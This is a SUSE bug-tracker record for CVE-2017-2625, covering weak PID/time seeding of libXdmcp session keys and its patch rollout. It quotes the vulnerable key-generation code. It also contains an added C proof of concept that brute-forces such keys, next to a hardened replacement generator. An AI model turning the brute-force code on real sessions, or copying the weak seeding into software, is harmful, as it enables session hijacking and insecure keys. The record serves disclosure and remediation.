Bug 1025046 (CVE-2017-2625)

Summary: VUL-0: CVE-2017-2625: libXdmcp: Weak entropy usage for session keys in libxdm
Product: [Novell Products] SUSE Security Incidents
Reporter: Matthias Gerstner <matthias.gerstner>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: abergmann, krahmer, matthias.gerstner, meissner, sndirsch
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
Whiteboard: CVSSv2:SUSE:CVE-2017-2625:4.9:(AV:L/AC:L/Au:N/C:C/I:N/A:N) maint:released:sle10-sp3:63742
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Bug Depends on:
Bug Blocks: 1025639
Attachments: X41-2017-001.txt

Description Matthias Gerstner 2017-02-13 16:32:48 UTC
Embargoed until CRD 2017-02-28.

Received via private discussion on mailing list:

Summary and Impact
------------------

To further explore the auth mechanism libXdmcp-1.1.2 was checked
as well.

XDM uses weak entropy to generate the session keys on non BSD systems:

	void
	XdmcpGenerateKey (XdmAuthKeyPtr key)
	{
	#ifndef HAVE_ARC4RANDOM_BUF
	    long    lowbits, highbits;

	    srandom ((int)getpid() ^ time((Time_t *)0));
	    lowbits = random ();
	    highbits = random ();
	    getbits (lowbits, key->data);
	    getbits (highbits, key->data + 4);
	#else
	    arc4random_buf(key->data, 8);
	#endif
	}

On multi-user systems it might be possible to check
the PID of the process and how long it is running to get
an estimate of these values, which could allow an attacker
to attach to the session of a different user. Several
checked linux distributions (debian, archlinux and ubuntu)
did not link against libbsd at the time this was found.
Comment 1 Matthias Gerstner 2017-02-13 16:35:54 UTC
Our codestreams don't even have that #else branch. Code is found in:

SUSE:SLE-10-SP3:Update/xorg-x11/xc/lib/Xdmcp/GenKey.c
SUSE:SLE-11:Update/xorg-x11-libXdmcp/libXdmcp-1.0.2/GenKey.c
SUSE:SLE-12:Update/libXdmcp/libXdmcp-1.1.1/Key.c

I guess we can consider all codestreams as affected.

There is no final patch available yet. In the worst case we can read some sensible random data from /dev/?random.
Comment 2 Swamp Workflow Management 2017-02-13 23:01:53 UTC
bugbot adjusting priority
Comment 4 Marcus Meissner 2017-02-28 14:55:55 UTC
now public
Comment 5 Marcus Meissner 2017-02-28 14:56:45 UTC
Created attachment 715739 [details]
X41-2017-001.txt

Weak entropy usage for session keys in libxdm
=============================================
Vulnerability Type: Other
Affected Products: libXdmcp
Attack Type: Local
Impact: Escalation of Privileges        
Severity Rating: medium
Confirmed Affected Version: 1.1.2 and lower
Confirmed Patched Version:
Vector: local
CVE: CVE-2017-2625
CVSS Score: 7.1
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N


Summary and Impact
------------------

To further explore the auth mechanism libXdmcp-1.1.2 was checked as well.

XDM uses weak entropy to generate the session keys on non BSD systems:

        void
        XdmcpGenerateKey (XdmAuthKeyPtr key)
        {
        #ifndef HAVE_ARC4RANDOM_BUF
            long    lowbits, highbits;
        
            srandom ((int)getpid() ^ time((Time_t *)0));
            lowbits = random ();
            highbits = random ();
            getbits (lowbits, key->data);
            getbits (highbits, key->data + 4);
        #else
            arc4random_buf(key->data, 8);
        #endif
        }

On multi-user systems it might be possible to check the PID of the process
and how long it is running to get an estimate of these values, which
could allow an attacker to attach to the session of a different user.
Several checked Linux distributions (debian testing, archlinux and
Ubuntu) did not link against libbsd at the time this was found.

Workaround
----------

Compile against libbsd
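The attack sketched in the description and in the X41 advisory above (estimate the PID and start time of the process, then enumerate seeds) is shown here as an added example; it is not libXdmcp code or part of the X41 report. It reimplements the quoted srandom()/random() derivation with pid and time as explicit parameters, then brute-forces a window of plausible (pid, time) pairs. It assumes the attacker has an oracle that says whether a candidate key is correct (in practice an XDMCP authentication attempt); in the demo the oracle just compares against the real key. getbits() is reconstructed to match libXdmcp's little-endian layout; its exact form is an assumption.

```c
/* Added example (not libXdmcp code): recovering a session key produced by the
 * srandom(getpid() ^ time(NULL)) path quoted above, by brute-forcing the seed
 * over a window of plausible PIDs and start times. Assumed: the attacker has
 * an oracle saying whether a candidate key is right (in practice, an XDMCP
 * authentication attempt); here it simply compares against the real key. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <unistd.h>

#define XDM_KEY_LEN 8

/* Splits a long into four little-endian bytes, as libXdmcp's getbits() does
 * (reconstructed here as an assumption; only the layout matters). */
static void getbits(long data, unsigned char *dst)
{
    dst[0] = (unsigned char)(data & 0xff);
    dst[1] = (unsigned char)((data >> 8) & 0xff);
    dst[2] = (unsigned char)((data >> 16) & 0xff);
    dst[3] = (unsigned char)((data >> 24) & 0xff);
}

/* The vulnerable derivation with pid and time as parameters, so the same
 * function produces the victim's key and every attacker guess. srandom()
 * takes an unsigned int, so even a completely unknown seed is only 32 bits:
 * the 64-bit key never had more than 32 bits of entropy. */
static void weak_generate_key(pid_t pid, time_t t, unsigned char key[XDM_KEY_LEN])
{
    long lowbits, highbits;

    srandom((unsigned int)((int)pid ^ t));
    lowbits = random();
    highbits = random();
    getbits(lowbits, key);
    getbits(highbits, key + 4);
}

typedef int (*key_oracle_fn)(const unsigned char key[XDM_KEY_LEN], void *ctx);

/* Tries every (pid, t) in the window. Returns how many candidates were tried
 * before the oracle accepted one (key copied to out), or -1 on failure. Many
 * pairs XOR to the same seed, so the real search space is smaller still. */
static long recover_key(key_oracle_fn oracle, void *ctx,
                        pid_t pid_lo, pid_t pid_hi, time_t t_lo, time_t t_hi,
                        unsigned char out[XDM_KEY_LEN])
{
    unsigned char cand[XDM_KEY_LEN];
    long tried = 0;

    for (time_t t = t_lo; t <= t_hi; t++) {
        for (pid_t pid = pid_lo; pid <= pid_hi; pid++) {
            weak_generate_key(pid, t, cand);
            tried++;
            if (oracle(cand, ctx)) {
                memcpy(out, cand, XDM_KEY_LEN);
                return tried;
            }
        }
    }
    return -1;
}

/* Demo oracle: ctx points at the real key. */
static int compare_oracle(const unsigned char key[XDM_KEY_LEN], void *ctx)
{
    return memcmp(key, ctx, XDM_KEY_LEN) == 0;
}

/* Generates the victim key for (pid, t), then searches pid +/- pid_slack and
 * t +/- t_slack. Returns the number of candidates tried, or -1 if the key was
 * not recovered. */
long recovery_roundtrip(pid_t pid, time_t t, int pid_slack, int t_slack)
{
    unsigned char real[XDM_KEY_LEN], found[XDM_KEY_LEN];
    long tried;

    weak_generate_key(pid, t, real);
    tried = recover_key(compare_oracle, real,
                        pid - pid_slack, pid + pid_slack,
                        t - t_slack, t + t_slack, found);
    if (tried < 0 || memcmp(real, found, XDM_KEY_LEN) != 0)
        return -1;
    return tried;
}

int main(void)
{
    /* Constructed victim: PID known to within +/-500 (from ps or /proc), start
     * time to within +/-10 minutes: about 1.2M seeds, well under a second. */
    long tried = recovery_roundtrip(1234, 1487000000, 500, 600);

    if (tried < 0) {
        puts("key not in window");
        return 1;
    }
    printf("key recovered after %ld candidates\n", tried);
    return 0;
}
```

The point the example makes concrete: the search cost is bounded by the attacker's uncertainty about two easily observable values, not by the key length, and because srandom() accepts only a 32-bit seed the upper bound is 2^32 guesses even with no information at all.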
Comment 6 Stefan Dirsch 2017-05-18 12:35:01 UTC
Seems the issue has meanwhile been addressed via git commits

0554324ec6bbc2071f5d1f8ad211a1643e29eb1f
6d1aee0310001eca8f6ded9814a2a70b3a774896

in libXdmcp.
Comment 7 Stefan Dirsch 2017-06-11 20:21:22 UTC
getentropy() needs glibc 2.25, which is currently only provided by factory. Leap 42.2/42.3 don't fulfill this requirement, let alone sle12, sle11, sle10.

arc4random_buf() needs libbsd. Do we really want to add this requirement for the Leap products (42.2/42.3)? On sle12, sle11, sle10 we apparently ship no libbsd.

Matthias? Marcus?
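Comment 1 suggests reading from /dev/?random where no better source exists, and Comment 7 lists the two library-provided options (arc4random_buf() via libbsd, getentropy() via glibc 2.25). The following is an added example, not the libXdmcp patch or any SUSE package change, of a replacement for the #ifndef HAVE_ARC4RANDOM_BUF branch that tries those sources in order and fails closed instead of ever seeding from PID and time. The HAVE_ARC4RANDOM_BUF and HAVE_GETENTROPY macros are assumed to come from the build system as in libXdmcp; with neither defined, as when compiled stand-alone here, the /dev/urandom path is what runs.

```c
/* Added example (not libXdmcp's fix): a replacement for the #ifndef
 * HAVE_ARC4RANDOM_BUF branch that never falls back to srandom()/random().
 * Order of preference: arc4random_buf() (BSD libc or libbsd), getentropy()
 * (glibc 2.25+), then /dev/urandom. The HAVE_* macros are assumed to come from
 * the build system as in libXdmcp; with neither defined, as here, the
 * /dev/urandom path is compiled and a missing or fake device is an error. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#if defined(HAVE_GETENTROPY) && !defined(HAVE_ARC4RANDOM_BUF)
#include <sys/random.h>   /* glibc; on the BSDs getentropy() lives in <unistd.h> */
#endif

#define XDM_KEY_LEN 8

/* Reads len bytes from /dev/urandom, retrying on EINTR and short reads.
 * Refuses anything that is not a character device, so a regular file planted
 * at that path (e.g. in a chroot with an incomplete /dev) is not mistaken for
 * the kernel RNG. Returns 0 on success, -1 on failure. */
static int urandom_bytes(unsigned char *buf, size_t len)
{
    struct stat st;
    size_t got = 0;
    int fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC | O_NOCTTY);

    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISCHR(st.st_mode)) {
        close(fd);
        return -1;
    }
    while (got < len) {
        ssize_t n = read(fd, buf + got, len - got);
        if (n < 0 && errno == EINTR)
            continue;
        if (n <= 0) {
            close(fd);
            return -1;
        }
        got += (size_t)n;
    }
    close(fd);
    return 0;
}

/* Fills key with 8 bytes from the platform CSPRNG. Returns 0 on success and
 * -1 on failure; a caller must treat -1 as fatal rather than fall through to
 * a time/PID seeded generator. */
int xdmcp_generate_key_secure(unsigned char key[XDM_KEY_LEN])
{
#if defined(HAVE_ARC4RANDOM_BUF)
    arc4random_buf(key, XDM_KEY_LEN);   /* cannot fail */
    return 0;
#elif defined(HAVE_GETENTROPY)
    return getentropy(key, XDM_KEY_LEN) == 0 ? 0 : -1;   /* 8 <= 256 bytes */
#else
    return urandom_bytes(key, XDM_KEY_LEN);
#endif
}

/* Cheap run-time sanity check: two consecutive keys are produced, differ from
 * each other and are not all zero. Catches a broken or stubbed source, not a
 * weak one. Returns 1 if OK, 0 otherwise. */
int keygen_selftest(void)
{
    unsigned char a[XDM_KEY_LEN], b[XDM_KEY_LEN];
    static const unsigned char zero[XDM_KEY_LEN] = {0};

    if (xdmcp_generate_key_secure(a) != 0 || xdmcp_generate_key_secure(b) != 0)
        return 0;
    if (memcmp(a, b, XDM_KEY_LEN) == 0)
        return 0;
    if (memcmp(a, zero, XDM_KEY_LEN) == 0 || memcmp(b, zero, XDM_KEY_LEN) == 0)
        return 0;
    return 1;
}

int main(void)
{
    unsigned char key[XDM_KEY_LEN];
    size_t i;

    if (!keygen_selftest() || xdmcp_generate_key_secure(key) != 0) {
        fputs("no usable entropy source, refusing to generate a key\n", stderr);
        return 1;
    }
    for (i = 0; i < XDM_KEY_LEN; i++)
        printf("%02x", key[i]);
    putchar('\n');
    return 0;
}
```

The design choice worth keeping whichever branch a distribution ends up with: the function returns an error rather than degrading, so the srandom(getpid() ^ time()) path cannot come back as a "fallback" on a system where the preferred source is missing.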
Comment 8 Stefan Dirsch 2017-06-11 20:32:17 UTC
Factory done: SR#502911
Comment 9 Bernhard Wiedemann 2017-06-11 22:00:56 UTC
This is an autogenerated message for OBS integration:
This bug (1025046) was mentioned in
https://build.opensuse.org/request/show/502911 Factory / libXdmcp
Comment 10 Marcus Meissner 2017-06-21 12:38:46 UTC
matthias has a suggestion in the other bug. sorry for not having time earlier for this
Comment 11 Stefan Dirsch 2017-06-27 12:59:44 UTC
Before adding replacements for getentropy() git commits

 6d1aee0310001eca8f6ded9814a2a70b3a774896
 0554324ec6bbc2071f5d1f8ad211a1643e29eb1f
 9f4cac7656b221ce2a8f97e7bd31e5e23126d001

need to be added for Leap 42.2 and older.
Comment 12 Stefan Dirsch 2017-06-28 15:21:08 UTC
fixed and submitrequested for Leap 42.2 and older (sle12, sle11 and sle10).
Comment 13 Stefan Dirsch 2017-06-28 15:22:24 UTC
Sorry! Reopen.
Comment 14 Stefan Dirsch 2017-06-28 15:23:13 UTC
Reassigning to security team instead!
Comment 15 Bernhard Wiedemann 2017-06-28 16:00:54 UTC
This is an autogenerated message for OBS integration:
This bug (1025046) was mentioned in
https://build.opensuse.org/request/show/506829 42.2 / libXdmcp
Comment 17 Swamp Workflow Management 2017-07-01 08:29:03 UTC
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2017-07-17.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/63741
Comment 18 Swamp Workflow Management 2017-07-06 22:11:11 UTC
openSUSE-SU-2017:1802-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
openSUSE Leap 42.2 (src):    libXdmcp-1.1.2-3.3.1
Comment 19 Marcus Meissner 2017-07-14 10:34:52 UTC
*** Bug 815650 has been marked as a duplicate of this bug. ***
Comment 20 Swamp Workflow Management 2017-07-14 16:12:52 UTC
SUSE-SU-2017:1862-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libXdmcp-1.1.1-10.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libXdmcp-1.1.1-10.1
SUSE Linux Enterprise Server 12-SP2 (src):    libXdmcp-1.1.1-10.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    libXdmcp-1.1.1-10.1
Comment 21 Swamp Workflow Management 2017-07-14 19:13:11 UTC
SUSE-SU-2017:1868-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    xorg-x11-libXdmcp-7.4-3.1
SUSE Linux Enterprise Server 11-SP4 (src):    xorg-x11-libXdmcp-7.4-3.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    xorg-x11-libXdmcp-7.4-3.1
Comment 22 Marcus Meissner 2017-10-25 19:18:06 UTC
released
Comment 23 Swamp Workflow Management 2018-02-01 17:11:06 UTC
SUSE-SU-2018:0338-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    libXdmcp-1.1.1-12.1
SUSE Linux Enterprise Server 12-SP3 (src):    libXdmcp-1.1.1-12.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    libXdmcp-1.1.1-12.1